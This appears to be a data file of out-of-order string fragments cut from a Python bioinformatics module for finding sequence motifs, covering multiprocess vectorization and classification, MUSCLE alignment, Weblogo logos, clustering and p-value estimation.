"block_size=100, n_jobs=-1): \"\"\"multiprocess_subarray.\"\"\" start_time = time.time() if n_jobs == -1: pool = mp.Pool()",
"+ 1 cooccurence_mtx = np.zeros((size, size)) for seq_id in sorted(seqs_summary): cluster_ids = [cluster_id",
"if success is False: break # TODO: run the predictor to learn the",
"begin) / 2) cluster_ids = set(cluster_ids) for i in cluster_ids: for j in",
"= self._seq_to_stdin_fasta(seqs) stdout = self._perform_ma(data) aligned_seqs = self._fasta_to_seqs(headers, stdout) return aligned_seqs # ------------------------------------------------------------------------------",
"= self.quality_filter( seqs, motives, freq_th=freq_th, std_th=std_th) return motives def compute_logo(self, cluster_id=None, motif=None): \"\"\"compute_logo.\"\"\"",
"if id1 < len(cluster_seqs): orders.append(int(id1)) if id2 < len(cluster_seqs): orders.append(int(id2)) return orders def",
"np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) score = 0 to_be_removed = [] for",
"len(clusters[cluster_id]), dtime)) logger.debug('After motives computation, %d motives' % len(motives)) return motives def _identify_mergeable_clusters(self,",
"self.compute_logo( cluster_id, motif=motives[cluster_id]) figname = self._save_logo(logo_image, cluster_id, fname) for logo_txt in logo_txts: txt.append(logo_txt)",
"start_time d_loc_time = time.time() - loc_start_time size = pos_data_matrix.shape logger.debug('%d %s (%.2f secs)",
"start_time)) logger.debug('Fitting') start_time = time.time() for i, (p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time",
">= median_len: sigs = sigs + sig[:median_len] sig = np.array(sigs) / float(len(seqs)) return",
"'wb') as f: f.write(logo) return imagename def _wrap_image(self, fname, fill_width=True, output_type='screen'): pwd =",
"start_time)) logger.debug('Annotating') start_time = time.time() subarrays_items = [] for i, p in enumerate(results):",
"sum(find_occurrences(needle, haystack)) size = len(haystack) return counts, float(counts) / size def extract_consensus(seqs, motives,",
"b)) class PValueEvaluator(object): \"\"\"Fit a parametrized sigmoid on the empirical cumulative distribution.\"\"\" def",
"plt.hist( locs, nbins, normed=0, facecolor='blue', alpha=0.3) plt.grid() plt.title(needle) plt.xlabel('Position') plt.ylabel('Num occurrences') if fname:",
"> min_cluster_size: return True else: return False def compute_motif(self, seqs=None, min_score=4, min_freq=0.6, min_cluster_size=10,",
"'' for i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common() l",
"for header, score, begin, end, subseq in self.decomposition_scores(seqs)] if scores: xs, ys =",
"regex_i, regex_j, distances, nbins=5, size=(6, 2), fname=None): \"\"\"plot_distance.\"\"\" ds = distances[(cluster_id_i, cluster_id_j)] plt.figure(figsize=size)",
"= np.min(sig[i - half_windw_size:i + half_windw_size]) if min_sig == sig[i]: yield i def",
"min_subarray_size, max_subarray_size)) for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time() -",
"= complexity self.n_clusters = n_clusters self.min_subarray_size = min_subarray_size self.max_subarray_size = max_subarray_size self.pos_block_size =",
"from eden.util.iterated_maximum_subarray import compute_max_subarrays_sequence from itertools import izip import time from sklearn.base import",
"score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, margin=1, output='all') subseqs = [] for subarray in subarrays: subseq_seq",
"decomposition_scores(self, seqs=None): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size,",
"of regex: %.2f' % (fr) txt.append(info) av = motives[cluster_id]['avg_pos'] st = motives[cluster_id]['std_pos'] info",
"motives.get(j, None): n_i = len(motives[i]['seqs']) n_j = len(motives[j]['seqs']) seqs = motives[i]['seqs'] + motives[j]['seqs']",
"return _motives def select_motives(self, seqs=None, p_value=0.05, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200, freq_th=None,",
"%d' % cluster_id txt.append(info) logo_image, logo_txts = self.compute_logo( cluster_id, motif=motives[cluster_id]) figname = self._save_logo(logo_image,",
"= c.most_common() seq += k[0][0] return seq def _compute_score(self, align_seqs, min_freq=0.8): dim =",
"def multiprocess_fit(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_fit.\"\"\" start_time = time.time() classes",
"resolution if fineprint: options.fineprint = fineprint self.options = options self.output_format = output_format def",
"motives[j]['seqs'] is_high_quality, motif = self.compute_motif( seqs=seqs, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) if is_high_quality:",
"open(imagename, 'wb') as f: f.write(logo) return imagename def _wrap_image(self, fname, fill_width=True, output_type='screen'): pwd",
"subsequences): self.clusters[pred].append(seq) logger.debug('After clustering, %d motives' % len(self.clusters)) return self.clusters except Exception as",
"import random import pylab as plt import joblib from scipy.optimize import curve_fit import",
"score = 0 to_be_removed = [] for i, row in enumerate(cluster.T): c =",
"sample_size: sample_seqs = random.sample(seqs, sample_size) else: sample_seqs = seqs align_seqs = ma.transform(seqs=sample_seqs) score,",
"= n_clusters self.min_subarray_size = min_subarray_size self.max_subarray_size = max_subarray_size self.pos_block_size = pos_block_size self.neg_block_size =",
"cooccurence_mtx = np.zeros((size, size)) for seq_id in sorted(seqs_summary): cluster_ids = [cluster_id for begin,",
"motives, freq_th=freq_th, std_th=std_th) return motives def compute_logo(self, cluster_id=None, motif=None): \"\"\"compute_logo.\"\"\" alphabet = 'rna'",
"stdout def _fasta_to_seqs(self, headers, stdout): out = list(_fasta_to_fasta(stdout.split('\\n'))) motif_seqs = [''] * len(headers)",
"ys def fit(self, scores): \"\"\"fit.\"\"\" if scores: xs, ys = self.ecdf(scores) popt, pcov",
"for seq_id in sorted(seqs_summary): cluster_ids = [cluster_id for begin, end, cluster_id in seqs_summary[seq_id]]",
"k[0][1] if float(val) / dim >= min_freq: score += 1 trimmed_align_seqs = []",
"is required # it over-rides tool.alphabet alphabet='dna', # ['dna', 'rna', 'protein'] ): \"\"\"Initialize",
"= consensus_regex(trimmed_align_seqs, regex_th) motif = {'consensus_seq': consensus_seq, 'regex_seq': regex_seq, 'trimmed_align_seqs': trimmed_align_seqs, 'align_seqs': align_seqs,",
"consensus_regex(trimmed_align_seqs, regex_th) motif = {'consensus_seq': consensus_seq, 'regex_seq': regex_seq, 'trimmed_align_seqs': trimmed_align_seqs, 'align_seqs': align_seqs, 'seqs':",
"range(len(ids) - 1): start = ids[i] end = ids[i + 1] width =",
"to_be_removed = [] for i, row in enumerate(cluster.T): c = Counter(row) k =",
"default values') logger.debug('ECDF fit on %d values' % (len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f'",
"wbl from scipy.cluster.hierarchy import linkage import regex as re from collections import Counter",
"np.nan_to_num(cooccurence_mtx) orig_cooccurence_mtx = cooccurence_mtx.copy() cooccurence_list = [] for i, row in enumerate(cooccurence_mtx): norm",
"abs(c_i - c_j): selected = c_i - c_j distances[(i, j)].append(selected) cooccurence_mtx = np.nan_to_num(cooccurence_mtx)",
"sequences.\"\"\" # seperate headers headers, instances = [list(x) for x in zip(*seqs)] if",
"%d (#%d), %d (#%d) score: %.2f' % \\ (i, n_i, j, n_j, rel_nw_score)",
"j in enumerate(instances): instances_seqrecord.append( SeqRecord(Seq(j, self.alphabet), id=str(i))) handle = StringIO() SeqIO.write(instances_seqrecord, handle, \"fasta\")",
"options.color_scheme = wbl.std_color_schemes[color_scheme] options.resolution = resolution if fineprint: options.fineprint = fineprint self.options =",
"maxhours=None, # TODO: check if this alphabet is required # it over-rides tool.alphabet",
"iterable = self.decompose(seqs, p_value=p_value) for header, begin, end, p, subseq in iterable: new_header",
"cluster_id=cluster_id, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for j in motives: regex_i = motives[i]['regex_seq']",
"score += 1 trimmed_align_seqs = [] for h, align_seq in align_seqs: trimmed_align_seq =",
"= plot_distance( cluster_id, j, regex_i, regex_j, distances, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image( figname, output_type=output_type))",
"0 return avg_loc, std_loc def hits(motives, ids=None): \"\"\"hits.\"\"\" for i in ids: for",
"import time from sklearn.base import BaseEstimator, ClassifierMixin from sklearn.linear_model import SGDClassifier from sklearn.cluster",
"box_decomposition(sig, half_windw_size=5): \"\"\"box_decomposition.\"\"\" ids = list(mean_shift_decomposition(sig, half_windw_size)) for i in range(len(ids) - 1):",
"sigp, alpha=0.3, color='g') sign = np.copy(sig) sign[sign >= 0] = 0 plt.bar(range(len(sign)), sign,",
"= min(d_ij) for c_i in centers[i]: for c_j in centers[j]: if selected_abs ==",
"if s[start:end]: yield (h, s[start:end]) def plot_cumulative_score(smod, seqs, size=(6, 2), fname=None): \"\"\"plot_cumulative_score.\"\"\" sig",
"muscle_cline = MuscleCommandline(**params) stdout, stderr = muscle_cline(stdin=data) return stdout def _fasta_to_seqs(self, headers, stdout):",
"end, cluster_id in seqs_summary[seq_id]: centers[cluster_id].append(begin + (end - begin) / 2) cluster_ids =",
"\"\"\"performance.\"\"\" try: y_pred, y_binary, y_test = multiprocess_performance( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size,",
"format) elif self.output_format == 'jpeg': return wbl.jpeg_formatter(data, format) else: return wbl.eps_formatter(data, format) #",
"min_score=4, min_freq=0.6, min_cluster_size=10, sample_size=200): ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs =",
"\"\"\"Constructor.\"\"\" self.random_state = random_state self.a = -4 self.b = 1 def ecdf(self, x):",
"estimator=estimator) subarrays_items = [] for (orig_header, orig_seq), (seq, score) in zip(iterable, annotated_seqs): subarrays",
"fr = motives[cluster_id]['freq'] info = ' - num occurrences of regex: %d' %",
"begin, end, subseq in self.decomposition_scores(seqs)] if scores: xs, ys = ecdf(scores) popt, pcov",
"/ float(len(seqs)) return sig def trim_seqs(seqs, smod, half_windw_size=7): \"\"\"trim_seqs.\"\"\" sig = cumulative_score(seqs, smod)",
"in chunks(iterable, pos_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Vectorizing') start_time =",
"an instance.\"\"\" options = wbl.LogoOptions() options.stacks_per_line = stacks_per_line options.sequence_type = sequence_type options.ignore_lower_case =",
"def compute_logo(self, cluster_id=None, motif=None): \"\"\"compute_logo.\"\"\" alphabet = 'rna' color_scheme = 'classic' wb =",
"(%.2f secs) (delta: %.2f)' % (i, d_time, d_loc_time)) pool.close() pool.join() return scores_items #",
"SeqRecord(Seq(j, self.alphabet), id=str(i))) handle = StringIO() SeqIO.write(instances_seqrecord, handle, \"fasta\") data = handle.getvalue() return",
"= code[0] else: code_str = '(' + '|'.join(code) + ')' return code_str def",
"in cluster_ids: cooccurence_mtx[i, j] += 1 if i != j: # find closest",
"id in motives] seqs_summary = defaultdict(list) for seq_id, begin, end, i in hits(motives,",
"if self.output_format == 'png': return wbl.png_formatter(data, format) elif self.output_format == 'png_print': return wbl.png_print_formatter(data,",
"motives[cluster_id]['consensus_seq']) txt.append(info) for freq, cluster_id in sorted([(motives[i]['freq'], i) for i in motives], reverse=True):",
"np.set_printoptions(precision=2) logger.info('Confusion matrix:') logger.info(cm) # classification logger.info('Classification:') logger.info(metrics.classification_report(y_test, y_binary)) # roc logger.info('ROC: %.3f'",
"alphabet == 'rna': self.alphabet = IUPAC.unambiguous_rna else: self.alphabet = IUPAC.unambiguous_dna def _seq_to_stdin_fasta(self, seqs):",
"size = len(trimmed_align_seqs) for i, row in enumerate(cluster.T): c = Counter(row) k =",
"start_time = time.time() subarrays_items = [] for i, p in enumerate(results): loc_start_time =",
"d_time, d_loc_time)) pool.close() pool.join() preds = np.hstack(preds) binary_preds = np.hstack(binary_preds) true_targets = np.hstack(true_targets)",
"sorted([(motives[i]['freq'], i) for i in motives], reverse=True): info = ' - %.2s %s'",
"motives[i]['consensus_seq'] seq_j = motives[j]['consensus_seq'] nw_score = edit_distance(seq_i, seq_j, gap_penalty=-1) rel_nw_score = 2 *",
"val, start, end, width def cumulative_score(seqs, smod): \"\"\"cumulative_score.\"\"\" median_len = np.median([len(s) for h,",
"val = sum(sig[start:end]) yield val, start, end, width def cumulative_score(seqs, smod): \"\"\"cumulative_score.\"\"\" median_len",
"self.clusters = defaultdict(list) for pred, seq in zip(preds, subsequences): self.clusters[pred].append(seq) logger.debug('After clustering, %d",
"int(out[i].split(' ')[0].split('>')[1]) motif_seqs[id] = out[i + 1] return zip(headers, motif_seqs) def transform(self, seqs=[]):",
"= [score for seq, score in annotated_seqs] return scores def multiprocess_score(iterable, vectorizer=None, estimator=None,",
"max_subarray_size self.pos_block_size = pos_block_size self.neg_block_size = neg_block_size self.n_jobs = n_jobs self.vectorizer = Vectorizer(complexity=complexity,",
"apply_async import numpy as np from scipy.sparse import vstack from eden.util.iterated_maximum_subarray import compute_max_subarrays_sequence",
"consensus_regex(trimmed_align_seqs, regex_th): \"\"\"consensus_regex.\"\"\" cluster = [] for h, align_seq in trimmed_align_seqs: str_list =",
"= -4 self.b = 1 def ecdf(self, x): \"\"\"Empirical cumulative distribution function.\"\"\" xs",
"info = ' - num occurrences of regex: %d' % (co) txt.append(info) info",
"score = float(score) loc = header.split('<loc>')[1] begin, end = loc.split(':') begin = int(begin)",
"= min_cluster_size logger.debug('Alignment') motives = dict() for cluster_id in clusters: start_time = time.time()",
"co-occurences %d %s vs %d %s: %d' % \\ (cluster_id, regex_i, j, regex_j,",
"score = subarray['score'] header = orig_header header += '<loc>%d:%d<loc>' % (begin, end) header",
"= float(score) loc = header.split('<loc>')[1] begin, end = loc.split(':') begin = int(begin) end",
"self._fasta_to_seqs(headers, stdout) return aligned_seqs # ------------------------------------------------------------------------------ class Weblogo(object): \"\"\"A wrapper of weblogolib for",
"pool.close() pool.join() data_matrix = vstack(matrices) return data_matrix def multiprocess_fit(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100,",
"sig def trim_seqs(seqs, smod, half_windw_size=7): \"\"\"trim_seqs.\"\"\" sig = cumulative_score(seqs, smod) val, start, end,",
"%.2s %s' % \\ (cluster_id, motives[cluster_id]['consensus_seq']) txt.append(info) for freq, cluster_id in sorted([(motives[i]['freq'], i)",
"defaultdict from eden import apply_async import numpy as np from scipy.sparse import vstack",
"2 locs.append(m) plt.figure(figsize=size) n, bins, patches = plt.hist( locs, nbins, normed=0, facecolor='blue', alpha=0.3)",
"zip(headers, motif_seqs) def transform(self, seqs=[]): \"\"\"Carry out alignment.\"\"\" headers, data = self._seq_to_stdin_fasta(seqs) stdout",
"= int(end) subseq = header.split('<subseq>')[1] orig_header = header.split('<loc>')[0] return orig_header, score, begin, end,",
"from Bio.Alphabet import IUPAC from Bio.Seq import Seq from Bio.SeqRecord import SeqRecord from",
"size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for j in motives: regex_i = motives[i]['regex_seq'] if j",
"= p.get() matrices += pos_data_matrix d_time = time.time() - start_time d_loc_time = time.time()",
"(delta: %.2f)' % (i, d_time, d_loc_time)) pool.close() pool.join() return subarrays_items def serial_score(iterable, vectorizer=None,",
"[] for i, p in enumerate(results): loc_start_time = time.time() scores = p.get() scores_items",
"is not None: params['maxhours'] = self.maxhours muscle_cline = MuscleCommandline(**params) stdout, stderr = muscle_cline(stdin=data)",
"parameters.') def _save_logo(self, logo, cluster_id, fname): imagename = '%s_logo_cl_%d.png' % (fname, cluster_id) with",
"min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.quality_filter( seqs, motives, freq_th=freq_th, std_th=std_th) return motives def",
"[cluster_id for begin, end, cluster_id in seqs_summary[seq_id]] centers = defaultdict(list) for begin, end,",
"all_seqs, cluster_id=cluster_id, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for j in motives: regex_i =",
"return data_matrix def chunks(iterable, n): \"\"\"chunks.\"\"\" iterable = iter(iterable) while True: items =",
"def _is_high_quality(self, seqs, min_score=4, min_freq=0.6, min_cluster_size=10, sample_size=200): ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) >",
"loc_start_time logger.debug('%d (%.2f secs) (delta: %.2f)' % (i, d_time, d_loc_time)) pool.close() pool.join() return",
"= ids[i] end = ids[i + 1] width = end - start val",
"= mp.Pool() else: pool = mp.Pool(n_jobs) pos_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer))",
"p, subseq except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception',",
"cluster_id_j, regex_i, regex_j, distances, nbins=5, size=(6, 2), fname=None): \"\"\"plot_distance.\"\"\" ds = distances[(cluster_id_i, cluster_id_j)]",
"sample_size=200): \"\"\"compute_motif.\"\"\" ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs = random.sample(seqs, sample_size)",
"= time.time() - start_time d_loc_time = time.time() - loc_start_time logger.debug('%d (%.2f secs) (delta:",
"[%d is now #%d]' % \\ (j, i, n_i + n_j) logger.debug(info1 +",
"start_time)) logger.debug('Vectorizing') start_time = time.time() matrices = [] for i, p in enumerate(results):",
"start_time = time.time() for i, (p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time = time.time()",
"'\" style=\"width: 100%\"></p>') else: if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url",
"/ n data_matrix = multiprocess_vectorize( subsequences, vectorizer=self.vectorizer, pos_block_size=pos_block_size, n_jobs=self.n_jobs) logger.debug('Clustering') logger.debug('working on %d",
"= letter_regex(k, size, regex_th=regex_th) if l: code += l return code def find_occurrences(needle,",
"smod.score(seqs): sig = np.array(scores) if len(sig) != median_len: logger.debug('Length mismatch: %d != %d'",
"int(begin) end = int(end) subseq = header.split('<subseq>')[1] orig_header = header.split('<loc>')[0] return orig_header, score,",
"params: a:%.2f b:%.2f' % (self.a, self.b)) def compute_p_value(self, value): \"\"\"p_value.\"\"\" y = sigmoid(value,",
"pos_data_matrix.shape logger.debug('%d %s (%.2f secs) (delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close()",
"= np.zeros((size, size)) for seq_id in sorted(seqs_summary): cluster_ids = [cluster_id for begin, end,",
"exc_info=True) def score(self, seqs=None): \"\"\"fit.\"\"\" try: for score in multiprocess_score(seqs, vectorizer=self.vectorizer, estimator=self.estimator, block_size=self.pos_block_size,",
"return scores def multiprocess_score(iterable, vectorizer=None, estimator=None, block_size=100, n_jobs=-1): \"\"\"multiprocess_score.\"\"\" start_time = time.time() if",
"in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Annotating') start_time =",
"= neg_block_size self.n_jobs = n_jobs self.vectorizer = Vectorizer(complexity=complexity, auto_weights=True, nbits=15) self.estimator = estimator",
"return motives else: logger.debug('After quality filter, %d motives' % len(_motives)) return _motives def",
"= seqs align_seqs = ma.transform(seqs=sample_seqs) score, trimmed_align_seqs = self._compute_score(align_seqs, min_freq=min_freq) if score >=",
"exc_info=True) def _order_clusters(self, clusters, complexity=3): sep = ' ' * (complexity * 2)",
"== 'png_print': return wbl.png_print_formatter(data, format) elif self.output_format == 'jpeg': return wbl.jpeg_formatter(data, format) else:",
"neg_seqs=None): \"\"\"fit.\"\"\" try: self.estimator = multiprocess_fit( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs)",
"for c_i in centers[i]: for c_j in centers[j]: if selected_abs == abs(c_i -",
"motives[cluster_id]['std_pos'] info = ' - average location: %.1f +- %.1f' % (av, st)",
"if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url + '\"></p>') else: txt.append('<p",
"= ' - consensus sequence: %s' % motif['consensus_seq'] logo_txt.append(info) info = ' -",
"s in seqs: if s[start:end]: yield (h, s[start:end]) def plot_cumulative_score(smod, seqs, size=(6, 2),",
"fname): imagename = '%s_logo_cl_%d.png' % (fname, cluster_id) with open(imagename, 'wb') as f: f.write(logo)",
"% len(subsequences)) n = multiprocessing.cpu_count() pos_block_size = len(subsequences) / n data_matrix = multiprocess_vectorize(",
"in range(len(ids) - 1): start = ids[i] end = ids[i + 1] width",
"start_time d_loc_time = time.time() - loc_start_time logger.debug('%d (%.2f secs) (delta: %.2f)' % (i,",
"100) else: logger.warning( 'No motives to report. Try more permissive parameters.') txt =",
"seq = \"\" for line in lines: if line: if line[0] == '>':",
"logger.warning('Quality filter is too strict. Ignoring filter.') return motives else: logger.debug('After quality filter,",
"co = motives[cluster_id]['counts'] fr = motives[cluster_id]['freq'] info = ' - num occurrences of",
"= len(trimmed_align_seqs) for i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common()",
"np.copy(sig) sigp[sigp < 0] = 0 plt.bar(range(len(sigp)), sigp, alpha=0.3, color='g') sign = np.copy(sig)",
"= figure_label options.show_xaxis = show_x_axis if x_label: options.xaxis_label = x_label options.show_yaxis = show_y_axis",
"# ['dna', 'rna', 'protein'] ): \"\"\"Initialize an instance.\"\"\" self.diags = diags self.maxiters =",
"seq_i = motives[i]['consensus_seq'] seq_j = motives[j]['consensus_seq'] nw_score = edit_distance(seq_i, seq_j, gap_penalty=-1) rel_nw_score =",
"!= 0: row /= norm else: row = np.zeros(row.shape) row[i] = 0 cooccurence_list.append(row)",
"pool = mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_subarray, args=(seqs,",
"for h, align_seq in trimmed_align_seqs: str_list = [c for c in align_seq] concat_str",
"+ 1) / float(len(xs)) return xs, ys def letter_regex(k, size, regex_th=0.3): \"\"\"letter_regex.\"\"\" code",
"data_matrix = vstack([pos_data_matrix, neg_data_matrix]) estimator.partial_fit(data_matrix, y, classes=classes) d_time = time.time() - start_time d_loc_time",
"MiniBatchKMeans from eden.sequence import Vectorizer from StringIO import StringIO from Bio import SeqIO",
"self.max_subarray_size = max_subarray_size self.pos_block_size = pos_block_size self.neg_block_size = neg_block_size self.n_jobs = n_jobs self.vectorizer",
"args=(seqs, vectorizer)) for seqs in chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs' % (time.time() -",
"= self._decompose_header(header) orig_header, score, begin, end, subseq = components p = self.compute_p_value(score) if",
"logo_image = wb.create_logo(seqs=motif['trimmed_align_seqs']) logo_txt = [] info = ' - num subarrays: %d'",
"vectorizer.transform(iterable) return data_matrix def chunks(iterable, n): \"\"\"chunks.\"\"\" iterable = iter(iterable) while True: items",
"[apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs'",
"(h, s[start:end]) def plot_cumulative_score(smod, seqs, size=(6, 2), fname=None): \"\"\"plot_cumulative_score.\"\"\" sig = cumulative_score(seqs, smod)",
"% (i, size, d_time, d_loc_time)) pool.close() pool.join() data_matrix = vstack(matrices) return data_matrix def",
"creating sequence.\"\"\" def __init__(self, output_format='png', # ['eps','png','png_print','jpeg'] stacks_per_line=40, sequence_type='dna', # ['protein','dna','rna'] ignore_lower_case=False, #",
"len(code) == 1: code_str = code[0] else: code_str = '(' + '|'.join(code) +",
"is_high_quality, motif = self.compute_motif( seqs=clusters[cluster_id], min_score=min_score, min_freq=min_freq, min_cluster_size=mcs, regex_th=regex_th, sample_size=sample_size) if is_high_quality: motives[cluster_id]",
"% \\ (j, i, n_i + n_j) logger.debug(info1 + info2) # update motives",
"motives, nbins=40, size=(17, 2), output_type='screen', fname=None): \"\"\"Report in markdown format.\"\"\" txt = []",
"i, (p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time = time.time() pos_data_matrix = p.get() y",
"mp.Pool(n_jobs) results = [apply_async( pool, serial_subarray, args=(seqs, vectorizer, estimator, min_subarray_size, max_subarray_size)) for seqs",
"wbl.LogoFormat(data, self.options) if self.output_format == 'png': return wbl.png_formatter(data, format) elif self.output_format == 'png_print':",
"in re.finditer(needle, s): s = match.start() e = match.end() m = s +",
"for id in motives: c_regex = consensus_regex(motives[id]['trimmed_align_seqs'], regex_th) counts, freq = occurrences(c_regex, seqs)",
"vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items: yield self._decompose_header(header)",
"format) else: return wbl.eps_formatter(data, format) # ------------------------------------------------------------------------------ class SequenceMotifDecomposer(BaseEstimator, ClassifierMixin): \"\"\"SequenceMotifDecomposer.\"\"\" def __init__(self,",
"< len(cluster_seqs): orders.append(int(id1)) if id2 < len(cluster_seqs): orders.append(int(id2)) return orders def _compute_consensus_seq(self, align_seqs):",
"info = ' - %.2s %s' % \\ (cluster_id, motives[cluster_id]['consensus_seq']) txt.append(info) for freq,",
"occurrences') if fname: plt.draw() figname = '%s_loc_%d.png' % (fname, cluster_id) plt.savefig( figname, bbox_inches='tight',",
"plt.close() return figname # ------------------------------------------------------------------------------ def serial_pre_process(iterable, vectorizer=None): \"\"\"serial_pre_process.\"\"\" data_matrix = vectorizer.transform(iterable) return",
"std_loc = 0 return avg_loc, std_loc def hits(motives, ids=None): \"\"\"hits.\"\"\" for i in",
"b:%.2f' % (self.a, self.b)) def predict(self, value): \"\"\"pvalue.\"\"\" y = sigmoid(value, self.a, self.b)",
"haystack): \"\"\"extract_location.\"\"\" locs = [] for h, s in haystack: for match in",
"\"\"\"extract_location.\"\"\" locs = [] for h, s in haystack: for match in re.finditer(needle,",
"= logo_range[0] options.logo_end = logo_range[1] options.scale_width = scale_stack_widths options.show_errorbars = error_bars if title:",
"pos_data_matrix d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time size =",
"transform(self, seqs=[]): \"\"\"Carry out alignment.\"\"\" headers, data = self._seq_to_stdin_fasta(seqs) stdout = self._perform_ma(data) aligned_seqs",
"and compute their gram matrix K cluster_vecs = Vectorizer(complexity).transform(cluster_seqs) gram_matrix = metrics.pairwise.pairwise_kernels( cluster_vecs,",
"if ids is None: ids = [id for id in motives] seqs_summary =",
"start_time)) logger.debug('Performance evaluation') start_time = time.time() preds = [] binary_preds = [] true_targets",
"= [] binary_preds = [] true_targets = [] for i, (p, n) in",
"sklearn.base import BaseEstimator, ClassifierMixin from sklearn.linear_model import SGDClassifier from sklearn.cluster import MiniBatchKMeans from",
"end, p, subseq except Exception as e: logger.debug('Failed iteration. Reason: %s' % e)",
"begin, end, p, subseq except Exception as e: logger.debug('Failed iteration. Reason: %s' %",
"cluster_id in clusters: if len(clusters[cluster_id]) > 0: seqs = [s for h, s",
"sample_size=sample_size) motives = self.merge( motives, similarity_th=similarity_th, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives =",
"+= '<score>%.4f<score>' % (score) header += '<subseq>%s<subseq>' % (subseq_seq) subseq = (header, seq)",
"self.random_state = random_state self.a = -4 self.b = 1 def ecdf(self, x): \"\"\"Empirical",
"average location: %.1f +- %.1f' % (av, st) txt.append(info) txt.append(self._wrap_image(figname, fill_width=False, output_type=output_type)) regex_i",
"preds = self.clusterer.fit_predict(data_matrix) self.class_estimator.fit(data_matrix, preds) self.clusterer_is_fit = True dtime = time.time() - start_time",
"data_matrix.shape[0]) start_time = time.time() self.clusterer.set_params(n_clusters=self.n_clusters) if self.clusterer_is_fit: preds = self.class_estimator.predict(data_matrix) else: preds =",
"subsequences, vectorizer=self.vectorizer, pos_block_size=pos_block_size, n_jobs=self.n_jobs) logger.debug('Clustering') logger.debug('working on %d instances' % data_matrix.shape[0]) start_time =",
"info = ' - consensus regex: %s' % motif['regex_seq'] logo_txt.append(info) return logo_image, logo_txt",
"\"\"\"multiprocess_subarray.\"\"\" start_time = time.time() if n_jobs == -1: pool = mp.Pool() else: pool",
"import metrics from eden.util.NeedlemanWunsh import edit_distance import random import pylab as plt import",
"% len(motives) txt.append(info) figname = plot_cumulative_score( self, pos_seqs, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for",
"fname=fname) txt.append(self._wrap_image( figname, output_type=output_type)) txt.append('_' * 100) else: logger.warning( 'No motives to report.",
"Seq from Bio.SeqRecord import SeqRecord from corebio.seq import Alphabet, SeqList import weblogolib as",
"preds = np.hstack(preds) binary_preds = np.hstack(binary_preds) true_targets = np.hstack(true_targets) return preds, binary_preds, true_targets",
"%.2f secs' % (time.time() - start_time)) logger.debug('Predicting') start_time = time.time() scores_items = []",
"start_time logger.debug('...done in %.2f secs' % (dtime)) self.clusters = defaultdict(list) for pred, seq",
"row in enumerate(cluster.T): c = Counter(row) k = c.most_common() l = letter_regex(k, size,",
"return wbl.png_print_formatter(data, format) elif self.output_format == 'jpeg': return wbl.jpeg_formatter(data, format) else: return wbl.eps_formatter(data,",
"count / float(size) > regex_th: if letter != '-': code.append(letter) if len(code) ==",
"return code def find_occurrences(needle, haystack): \"\"\"find_occurrences.\"\"\" for h, s in haystack: matches =",
"items.append(it) yield items def multiprocess_vectorize(iterable, vectorizer=None, pos_block_size=100, n_jobs=-1): \"\"\"multiprocess_vectorize.\"\"\" start_time = time.time() if",
"pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_performance.\"\"\" start_time = time.time() if n_jobs == -1: pool =",
"= c_i - c_j distances[(i, j)].append(selected) cooccurence_mtx = np.nan_to_num(cooccurence_mtx) orig_cooccurence_mtx = cooccurence_mtx.copy() cooccurence_list",
"min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) if is_high_quality: info1 = 'Joining: %d (#%d), %d (#%d) score:",
